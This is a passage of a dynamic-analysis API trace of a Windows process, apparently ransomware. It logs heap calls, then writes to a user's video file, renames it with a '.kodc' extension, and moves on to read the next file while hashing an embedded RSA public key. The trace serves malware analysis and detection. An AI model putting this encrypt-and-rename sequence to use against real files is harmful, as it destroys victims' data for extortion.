(HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c730 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cc8 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cf8 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d10 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.455] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cf8 | out: hHeap=0x630000) returned 1 [0100.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d10 | out: hHeap=0x630000) returned 1 [0100.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d10 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7cf8 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d10 | out: hHeap=0x630000) returned 1 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cf8 | out: hHeap=0x630000) returned 1 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.456] GetCurrentThreadId () returned 0x42c [0100.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6da8 [0100.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.457] GetCurrentThreadId () returned 0x42c [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cf8 [0100.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d10 [0100.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ce0 [0100.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d28 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cf8 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cf8 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0100.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cf8 | out: hHeap=0x630000) returned 1 [0100.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d28 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d10 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ce0 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cc8 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c730 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.461] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0x939e, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x939e, lpOverlapped=0x0) returned 1 [0100.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0100.462] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x93a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.462] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.462] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.462] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.462] CloseHandle (hObject=0x5cc) returned 1 [0100.464] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S7HFtHlscpsrLt.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s7hfthlscpsrlt.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S7HFtHlscpsrLt.mp4.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s7hfthlscpsrlt.mp4.kodc")) returned 1 [0100.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.465] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.466] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78af17e0, ftCreationTime.dwHighDateTime=0x1d5bf99, ftLastAccessTime.dwLowDateTime=0xc3bc7d60, ftLastAccessTime.dwHighDateTime=0x1d5c11d, ftLastWriteTime.dwLowDateTime=0xc3bc7d60, ftLastWriteTime.dwHighDateTime=0x1d5c11d, nFileSizeHigh=0x0, nFileSizeLow=0x7936, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqUbnXT-jNRb5-frgY.avi", cAlternateFileName="SQUBNX~1.AVI")) returned 1 [0100.466] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqUbnXT-jNRb5-frgY.avi") returned=".avi" [0100.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqUbnXT-jNRb5-frgY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\squbnxt-jnrb5-frgy.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.467] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=31030) returned 1 [0100.467] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.470] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.471] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.472] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x7936, lpOverlapped=0x0) returned 1 [0100.472] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.472] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.472] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.472] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.473] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.474] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.474] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.474] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.474] GetLastError () returned 0x0 [0100.474] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.474] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.474] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.474] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.474] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7940) returned 0x9ba8d90 [0100.474] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c730 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cc8 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c778 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ce0 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d10 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d28 [0100.475] RtlAllocateHeap (HeapHandle=0x630000, 